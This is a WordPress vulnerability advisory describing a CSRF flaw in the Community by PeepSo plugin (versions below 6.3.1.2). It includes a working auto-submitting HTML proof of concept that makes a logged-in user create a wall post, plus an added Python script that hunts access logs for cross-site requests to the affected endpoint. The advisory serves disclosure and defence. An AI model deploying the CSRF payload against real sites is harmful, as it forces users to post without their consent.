WordPress Plugin Vulnerabilities
Community by PeepSo < 6.3.1.2 - User Post Creation via CSRF
Description
The plugin does not have a CSRF check when creating a user post (visible on their wall in their profile page), which could allow attackers to make logged-in users perform such an action via a CSRF attack.
Proof of Concept
1. Log in as a normal user.
2. Save the content below as an HTML file.

<html>
  <body>
    <form action="https://example.com/peepsoajax/postbox.post" method="POST">
      <input type="hidden" name="content" value="testing by bikram " />
      <input type="hidden" name="id" value="2" />
      <input type="hidden" name="uid" value="2" />
      <input type="hidden" name="acc" value="10" />
      <input type="hidden" name="type" value="activity" />
      <input type="hidden" name="mood" value="0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

3. Change the ID and UID values to your account ID.
4. Open the above HTML file and submit it. A new post will be created and can be seen in the profile page (default /profile/).
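For sites that ran a version below 6.3.1.2, the request shape in the proof of concept can be hunted for in web server access logs. The script below is an added example, not part of the advisory or of PeepSo's code. It assumes Combined Log Format, a site host of example.com, and that legitimate posts are sent from the site's own pages and therefore carry a same-site Referer; the log lines are constructed.

```python
import re

from urllib.parse import urlsplit

ENDPOINT = "/peepsoajax/postbox.post"  # path from the advisory's proof of concept

# Combined Log Format (assumed): ip - user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def classify(line, site_host):
    """Return None for unrelated lines, else (verdict, ip, time, referer)."""
    m = LINE_RE.match(line.strip())
    if not m or m["method"] != "POST":
        return None
    if not m["path"].split("?", 1)[0].rstrip("/").endswith(ENDPOINT):
        return None
    referer = m["referer"]
    try:
        host = (urlsplit(referer).hostname or "").lower()
    except ValueError:  # malformed Referer: treat as not same-site
        host = ""
    if referer in ("", "-"):
        verdict = "no-referer"   # e.g. a form submitted from a local HTML file
    elif host == site_host.lower():
        verdict = "same-site"    # exact host match, not a substring test
    else:
        verdict = "cross-site"
    return verdict, m["ip"], m["time"], referer

def suspicious(lines, site_host):
    """Keep only postbox.post requests that did not come from the site itself."""
    results = (classify(line, site_host) for line in lines)
    return [r for r in results if r and r[0] != "same-site"]

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.10 - - [09/Jan/2024:10:00:01 +0000] "POST /peepsoajax/postbox.post HTTP/1.1" 200 512 "https://example.com/profile/" "Mozilla/5.0"',
    '203.0.113.11 - - [09/Jan/2024:10:02:17 +0000] "POST /peepsoajax/postbox.post HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [09/Jan/2024:10:05:40 +0000] "POST /peepsoajax/postbox.post HTTP/1.1" 200 501 "https://other.example.net/page.html" "Mozilla/5.0"',
    '203.0.113.10 - - [09/Jan/2024:10:06:02 +0000] "GET /profile/ HTTP/1.1" 200 20480 "https://example.com/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for verdict, ip, when, referer in suspicious(SAMPLE_LOG, "example.com"):
        print(f"{when} {ip} {verdict} referer={referer}")
```

A hit is a lead to review, not proof of abuse: privacy extensions and referrer policies also strip the Referer header.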
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
Miscellaneous
Original Researcher
Bikram Kharal
Submitter
Bikram Kharal
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-09 (about 4 months ago)
Added
2024-01-09 (about 4 months ago)
Last Updated
2024-01-09 (about 4 months ago)